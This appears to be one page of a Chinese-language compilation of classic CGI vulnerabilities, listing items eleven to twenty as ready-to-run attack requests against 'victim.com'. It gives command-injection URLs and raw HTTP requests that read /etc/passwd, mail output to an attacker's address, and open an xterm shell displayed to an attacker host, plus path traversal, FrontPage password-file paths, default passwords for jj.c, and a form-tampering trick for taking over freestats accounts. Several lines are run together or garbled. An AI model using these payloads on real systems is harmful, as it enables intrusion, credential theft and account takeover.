CGI漏洞精典汇总

十一.campas
lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

十二.webgais
telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"line)
query=';mail+drazvan\@pop3.kappa.roparagraph

十三.websendmail
telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a&content=a

十四.handler
telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0
or
GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
or
GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/s
h|?data=Download
注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令.

十五.test-cgi
lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
得到一些http的目录
lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
这招好象并不管用.:(
lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
还可以这样试
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

十六.对于某些BSD的apache可以:
lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd

十七.htmlscript
lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

十八.jj.c
The demo cgi program jj.c calls /bin/mail without filtering user
input, so any program based on jj.c could potentially be exploited by
simply adding a followed by a Unix command. It may require a
password, but two known passwords include HTTPdrocks and SDGROCKS. If
you can retrieve a copy of the compiled program running strings on it
will probably reveil the password.
Do a web search on jj.c to get a copy and study the code yourself if
you have more questions.

十九.Frontpage extensions
如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本
和它在服务器上的路径. 还有一些密码文件如:
http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd

二十.Freestats.com CGI
没有碰到过,觉的有些地方不能搞错,所以直接贴英文.
John Carlton found following. He developed an exploit for the
free web stats services offered at freestats.com, and supplied the
webmaster with proper code to patch the bug.
Start an account with freestats.com, and log in. Click on the
area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER
INFO" This will call up a file called edit.pl with your user #
and password included in it. Save this file to your hard disk and
open it with notepad. The only form of security in this is a
hidden attribute on the form element of your account number.
Change this from
*input type=hidden name=account value=your#*
to
*input type=text name=account value=""*
Save your page and load it into your browser. Their will now be a
text input box where the hidden element was before. Simply type a
# in and push the "click here to update user profile" and all the
information that appears on your screen has now been written to
that user profile.
But that isn't the worst of it. By using frames (2 frames, one to
hold this page you just made, and one as a target for the form
submission) you could change the password on all of their accounts
with a simple JavaScript function.
Deep inside the web site authors still have the good old "edit.pl"
script. It takes some time to reach it (unlike the path described)
but you can reach it directly at:
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

上一页  [1] [2] [3] [4] 下一页